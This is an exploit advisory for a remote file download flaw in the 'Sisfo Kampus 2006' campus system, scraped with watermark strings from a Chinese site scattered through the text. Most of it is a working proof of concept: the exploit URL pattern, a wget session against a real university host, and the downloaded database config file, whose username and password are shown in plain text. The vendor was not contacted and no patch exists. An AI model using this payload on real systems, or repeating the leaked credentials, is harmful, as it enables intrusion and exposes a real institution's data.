Sisfo Kampus 2006 (dwoprn.php f) Remote File Download Vulnerability

POC : 网管联盟bitsCN_com

=========================

  网管联盟bitsCN@com

http://[h0sT]/[dir]/dwoprn.php?f=connectdb.php

  网管有家bitscn.net

中国网管论坛bbs.bitsCN.com

[pupet@vps ~]$ wget http://***.*****-subang.ac.id/dwoprn.php?f=connectdb.php 网管下载dl.bitscn.com

--07:30:16--  http://***.*****-subang.ac.id/dwoprn.php?f=connectdb.php 中国网管联盟bitsCN.com

           => `dwoprn.php?f=connectdb.php'

Resolving ***.*****-subang.ac.id... 203.130.***.** 网管u家u.bitscn@com

Connecting to siak.universitas-subang.ac.id[203.130.***.**]:80... connected.

网管网www.bitscn.com

HTTP request sent, awaiting response... 200 OK

Length: 292 [application/dwoprn]

网管网www.bitscn.com

  网管u家u.bitscn@com

100%[====================================================================================================================================================================>] 292           --.--K/s

网管朋友网www_bitscn_net

07:30:22 (2.78 MB/s) - `dwoprn.php?f=connectdb.php' saved [292/292]

  网管朋友网www_bitscn_net

[pupet@vps ~]$ cat dwoprn.php?f=connectdb.php 网管有家bitscn.net

<?php 网管u家www.bitscn.net

  // file: connectdb.php

网管u家www.bitscn.net

  // author: E. Setio Dewo, Maret 2003 网管u家www.bitscn.net

  $db_username = "t26924_siak";

  $db_hostname = "localhost";

  $db_password = "siakang"; 网管u家bitscn.net

  $db_name = "t26924_siak";

  网管u家u.bitscn@com

  $con = _connect($db_hostname, $db_username, $db_password);

  $db  = _select_db($db_name, $con); 网管u家u.bitscn@com

网管下载dl.bitscn.com

?> 网管联盟bitsCN_com

Vendor Response: 网管网www.bitscn.com

==============

网管联盟bitsCN_com

Not contacted yet

网管有家bitscn.net

Patch :

============= 网管u家bitscn.net

No Patch Available

This bugs Discover by : k-one A.K.A PUPET (Join our community at irc.indoirc.net #safana)

中国网管联盟bitsCN.com